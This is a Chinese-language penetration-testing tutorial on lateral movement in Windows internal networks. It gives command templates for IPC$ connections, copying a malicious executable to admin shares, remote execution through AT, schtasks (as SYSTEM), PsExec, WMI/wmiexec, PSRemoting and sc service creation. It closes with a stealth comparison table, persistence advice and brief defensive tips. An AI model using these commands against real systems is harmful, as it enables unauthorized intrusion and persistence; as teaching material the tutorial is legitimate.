内网渗透中用到的计划任务
字数 1150 2025-08-29 08:32:18

内网渗透中的计划任务利用技术详解

一、IPC$共享利用

1.1 IPC$连接与验证

连接命令:

net use \\目标IP\IPC$ "密码" /user:"用户名"

常见错误:

  • System error 1312:目标未开启IPC共享或会话已终止

成功标志:

命令成功完成。

1.2 文件传输操作

文件上传:

copy 本地文件 \\目标IP\C$\目标路径

文件下载:

copy \\目标IP\C$\路径\文件 本地保存路径

二、命令执行技术

2.1 计划任务利用

AT命令(适用于较旧Windows系统)

基本流程:

  1. 查看目标系统时间:
net time \\目标IP
  1. 上传恶意文件:
copy evil.exe \\目标IP\c$\windows\temp\evil.exe
  1. 创建计划任务:
at \\目标IP 执行时间 "C:\路径\程序.exe -参数"
  1. 删除计划任务:
at \\目标IP 任务ID /delete

限制:

  • 容易将任务安排到第二天
  • Windows Server 2008及更新版本可能不支持

Schtasks命令(更强大的替代方案)

创建计划任务:

schtasks /create /s 目标IP /u 用户名 /p 密码 /ru "SYSTEM" /tn 任务名 /sc DAILY /st 执行时间 /tr "执行命令" /F

执行计划任务:

schtasks /run /s 目标IP /u 用户名 /p 密码 /tn 任务名

删除计划任务:

schtasks /delete /tn 任务名 /f /s 目标IP

优点:

  • 支持更多参数和选项
  • 可指定运行账户(如SYSTEM)

缺点:

  • 命令语法复杂

2.2 PsExec工具

基本用法:

psexec \\目标IP 执行命令
psexec.exe \\目标IP –accepteula -u 用户名 -p 密码 -c 要复制的文件

可能失败原因:

  1. ADMIN$共享未开启
  2. 服务安装失败
  3. 退出时服务删除失败

2.3 SRV工具

获取交互式shell:

  1. 创建计划任务执行srv.exe:
at \\目标IP 执行时间 srv.exe
  1. 连接telnet:
telnet 目标IP 5188

限制:

  • 需要目标开启telnet客户端服务
  • 可能被杀毒软件拦截

2.4 WMI技术

基本命令执行:

wmic /node:目标IP /user:用户名 /password:密码 process call create "执行命令"

使用wmiexec.vbs脚本:

  1. 获取半交互式shell:
cscript.exe //nologo wmiexec.vbs /shell 目标IP 用户名 密码
  1. 执行单条命令:
cscript.exe wmiexec.vbs /cmd 目标IP 用户名 密码 "命令"

Python实现:

wmiexec.py 用户名:密码@目标IP

2.5 PowerShell远程执行(PSRemoting)

条件:

  • 目标开启WinRM服务(监听5985/5986端口)
  • 默认在Windows Server 2012+开启

基本命令:

Enter-PSSession 目标IP -Credential 用户名

2.6 服务控制(SC)技术

系统权限执行:

sc \\目标IP create 服务名 binpath= "执行命令"
sc \\目标IP start 服务名
sc \\目标IP delete 服务名

指定用户权限执行:

sc \\目标IP create 服务名 binpath= "执行命令" obj= 域\用户名 passwrod= 密码
sc \\目标IP start 服务名

三、技术对比与选择建议

技术 适用系统 权限要求 隐蔽性 复杂度
AT命令 旧版Windows 管理员
Schtasks 所有Windows 管理员
PsExec 所有Windows 管理员
WMI Windows 2000+ 管理员
PSRemoting Windows 2008R2+ 管理员
服务控制 所有Windows 管理员

选择建议:

  1. 对旧系统优先尝试AT命令
  2. 对新系统使用WMI或Schtasks
  3. 需要交互式会话时考虑SRV或PSRemoting
  4. 需要持久化时使用服务控制技术

四、防御建议

  1. 限制IPC$共享访问
  2. 监控计划任务创建和修改
  3. 限制WMI和PSRemoting使用
  4. 实施严格的权限控制
  5. 监控异常服务创建和启动
  6. 启用杀毒软件和EDR解决方案
内网渗透中的计划任务利用技术详解 一、IPC$共享利用 1.1 IPC$连接与验证 连接命令: 常见错误: System error 1312 :目标未开启IPC共享或会话已终止 成功标志: 1.2 文件传输操作 文件上传: 文件下载: 二、命令执行技术 2.1 计划任务利用 AT命令(适用于较旧Windows系统) 基本流程: 查看目标系统时间: 上传恶意文件: 创建计划任务: 删除计划任务: 限制: 容易将任务安排到第二天 Windows Server 2008及更新版本可能不支持 Schtasks命令(更强大的替代方案) 创建计划任务: 执行计划任务: 删除计划任务: 优点: 支持更多参数和选项 可指定运行账户(如SYSTEM) 缺点: 命令语法复杂 2.2 PsExec工具 基本用法: 可能失败原因: ADMIN$共享未开启 服务安装失败 退出时服务删除失败 2.3 SRV工具 获取交互式shell: 创建计划任务执行srv.exe: 连接telnet: 限制: 需要目标开启telnet客户端服务 可能被杀毒软件拦截 2.4 WMI技术 基本命令执行: 使用wmiexec.vbs脚本: 获取半交互式shell: 执行单条命令: Python实现: 2.5 PowerShell远程执行(PSRemoting) 条件: 目标开启WinRM服务(监听5985/5986端口) 默认在Windows Server 2012+开启 基本命令: 2.6 服务控制(SC)技术 系统权限执行: 指定用户权限执行: 三、技术对比与选择建议 | 技术 | 适用系统 | 权限要求 | 隐蔽性 | 复杂度 | |------|---------|---------|--------|--------| | AT命令 | 旧版Windows | 管理员 | 中 | 低 | | Schtasks | 所有Windows | 管理员 | 中 | 高 | | PsExec | 所有Windows | 管理员 | 低 | 中 | | WMI | Windows 2000+ | 管理员 | 高 | 中 | | PSRemoting | Windows 2008R2+ | 管理员 | 高 | 高 | | 服务控制 | 所有Windows | 管理员 | 中 | 中 | 选择建议: 对旧系统优先尝试AT命令 对新系统使用WMI或Schtasks 需要交互式会话时考虑SRV或PSRemoting 需要持久化时使用服务控制技术 四、防御建议 限制IPC$共享访问 监控计划任务创建和修改 限制WMI和PSRemoting使用 实施严格的权限控制 监控异常服务创建和启动 启用杀毒软件和EDR解决方案